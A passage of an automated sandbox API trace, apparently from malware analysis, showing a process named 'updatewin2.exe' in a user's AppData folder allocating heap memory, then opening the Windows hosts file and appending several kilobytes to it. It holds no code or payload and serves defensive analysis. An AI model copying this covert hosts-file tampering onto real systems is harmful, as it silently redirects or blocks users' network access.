Flags=0x8, Size=0x6c) returned 0x59c5e8 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x6e) returned 0x59c660 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x78) returned 0x581180 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x62) returned 0x59c6d8 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x5852d0 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x59c748 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x28) returned 0x59a470 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1a) returned 0x59c028 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4a) returned 0x59c798 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x72) returned 0x581200 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x30) returned 0x585308 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x585340 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1c) returned 0x59c050 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd2) returned 0x59c7f0 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x7c) returned 0x59c8d0 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x36) returned 0x59c958 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3a) returned 0x59db58 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x90) returned 0x59c998 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x59ca30 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x30) returned 0x585378 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x36) returned 0x59ca60 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x59caa0 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x52) returned 0x59caf0 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x59dba0 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x82) returned 0x59cb50 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x5853b0 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x59c078 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2c) returned 0x5853e8 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x59cbe0 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x52) returned 0x59cc40 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2a) returned 0x585420 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x59dbe8 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x59cca0 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x59cd00 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x30) returned 0x585458 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x8c) returned 0x59cd30 [0112.768] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59d020 | out: hHeap=0x570000) returned 1 [0112.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x800) returned 0x59cdc8 [0112.769] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0112.769] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402b17) returned 0x404e49 [0112.874] GetStartupInfoW (in: lpStartupInfo=0x18f590 | out: lpStartupInfo=0x18f590*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0112.875] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1423) returned 0x59eaf8 [0112.875] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1423) returned 0x59ff28 [0112.875] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c118 [0112.875] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x59d5d0 [0112.875] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c140 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x585490 [0112.876] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59d5d0 | out: hHeap=0x570000) returned 1 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c168 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x48) returned 0x59d5d0 [0112.876] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585490 | out: hHeap=0x570000) returned 1 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c190 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x60) returned 0x59d620 [0112.876] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59d5d0 | out: hHeap=0x570000) returned 1 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x90) returned 0x59d688 [0112.876] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59d620 | out: hHeap=0x570000) returned 1 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c1b8 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xd8) returned 0x59d720 [0112.876] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59d688 | out: hHeap=0x570000) returned 1 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c1e0 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c208 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x138) returned 0x59d5d0 [0112.876] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59d720 | out: hHeap=0x570000) returned 1 [0112.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c230 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c258 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c280 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c2a8 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1c8) returned 0x59d710 [0112.877] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59d5d0 | out: hHeap=0x570000) returned 1 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c2d0 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c2f8 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c320 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c348 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2a0) returned 0x5a1358 [0112.877] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59d710 | out: hHeap=0x570000) returned 1 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c370 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c398 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c3c0 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c3e8 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c410 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x59c438 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1618 [0112.877] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1640 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3f0) returned 0x59d5d0 [0112.878] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1358 | out: hHeap=0x570000) returned 1 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1668 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1690 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a16b8 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a16e0 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1708 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1730 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1758 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1780 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a17a8 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5e8) returned 0x5a1e00 [0112.878] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59d5d0 | out: hHeap=0x570000) returned 1 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a17d0 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a17f8 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1820 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1848 [0112.878] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1870 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1898 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a18c0 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a18e8 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1910 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1938 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8d0) returned 0x5a23f0 [0112.879] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a1e00 | out: hHeap=0x570000) returned 1 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1960 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1988 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a19b0 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a19d8 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1a00 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1a28 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1a50 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1a78 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1aa0 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1ac8 [0112.879] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1af0 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1b18 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1b40 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1b68 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1b90 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1bb8 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xd38) returned 0x5a2cc8 [0112.880] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a23f0 | out: hHeap=0x570000) returned 1 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1be0 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1c08 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1c30 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1c58 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1c80 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1ca8 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1cd0 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1cf8 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1d20 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1d48 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1d70 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1d98 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1dc0 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1e18 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1e40 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1e68 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1e90 [0112.880] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1eb8 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1ee0 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1f08 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1f30 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1f58 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1f80 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1fa8 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1fd0 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a1ff8 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2020 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2048 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13eb) returned 0x5a3a08 [0112.881] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2cc8 | out: hHeap=0x570000) returned 1 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2070 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2098 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a20c0 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a20e8 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x585490 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2110 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2138 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2160 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2188 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a21b0 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a21d8 [0112.881] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2200 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2228 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2250 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2278 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a22a0 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a22c8 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a22f0 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2318 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2340 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2368 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2390 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a23b8 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a23e0 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2408 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2430 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2458 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2480 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a24a8 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a24d0 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a24f8 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2520 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2548 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2570 [0112.882] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2598 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a25c0 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2618 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1dc3) returned 0x5a4e00 [0112.883] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a3a08 | out: hHeap=0x570000) returned 1 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2640 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2668 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2690 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a26b8 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a26e0 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2708 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2730 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2758 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2780 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a27a8 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a27d0 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a27f8 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2820 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2848 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2870 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2898 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a28c0 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a28e8 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2910 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2938 [0112.883] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2960 [0112.884] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2988 [0112.884] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a29b0 [0112.884] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a29d8 [0112.884] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2a00 [0112.884] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2a28 [0112.884] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2a50 [0112.884] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2a78 [0112.884] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5a2aa0 [0112.884] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59ff28 | out: hHeap=0x570000) returned 1 [0112.884] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18edb0 | out: pszPath="C:\\Windows") returned 0x0 [0112.899] PathAppendW (in: pszPath="C:\\Windows", pMore="System32\\drivers\\etc\\hosts" | out: pszPath="C:\\Windows\\System32\\drivers\\etc\\hosts") returned 1 [0112.899] CreateFileW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\hosts" (normalized: "c:\\windows\\system32\\drivers\\etc\\hosts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0112.900] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x338 [0112.900] SetFilePointer (in: hFile=0xa0, lDistanceToMove=824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x338 [0112.900] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x585500 [0112.900] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x47) returned 0x5a0110 [0112.900] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585500 | out: hHeap=0x570000) returned 1 [0112.900] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6a) returned 0x5a0160 [0112.900] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a0110 | out: hHeap=0x570000) returned 1 [0112.900] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9e) returned 0x5a01d8 [0112.900] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a0160 | out: hHeap=0x570000) returned 1 [0112.900] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xec) returned 0x5a0280 [0112.900] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a01d8 | out: hHeap=0x570000) returned 1 [0112.900] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x161) returned 0x5a0110 [0112.900] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a0280 | out: hHeap=0x570000) returned 1 [0112.900] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x211) returned 0x5a0280 [0112.900] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a0110 | out: hHeap=0x570000) returned 1 [0112.900] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x319) returned 0x5a04a0 [0112.900] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a0280 | out: hHeap=0x570000) returned 1 [0112.900] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4a5) returned 0x5a07c8 [0112.900] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a04a0 | out: hHeap=0x570000) returned 1 [0112.900] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6f7) returned 0x5a0c78 [0112.901] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a07c8 | out: hHeap=0x570000) returned 1 [0112.901] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa72) returned 0x5a0110 [0112.901] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a0c78 | out: hHeap=0x570000) returned 1 [0112.901] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfaa) returned 0x5a2e00 [0112.901] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a0110 | out: hHeap=0x570000) returned 1 [0112.901] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x17a1) returned 0x5a6bd0 [0112.901] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a2e00 | out: hHeap=0x570000) returned 1 [0112.901] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x235f) returned 0x5a8380 [0112.901] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a6bd0 | out: hHeap=0x570000) returned 1 [0112.901] WriteFile (in: hFile=0xa0, lpBuffer=0x5a83a0*, nNumberOfBytesToWrite=0x1c76, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x5a83a0*, lpNumberOfBytesWritten=0x18ed70*=0x1c76, lpOverlapped=0x0) returned 1 [0112.902] CloseHandle (hObject=0xa0) returned 1 [0112.998] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a8380 | out: hHeap=0x570000) returned 1 [0112.998] HeapFree 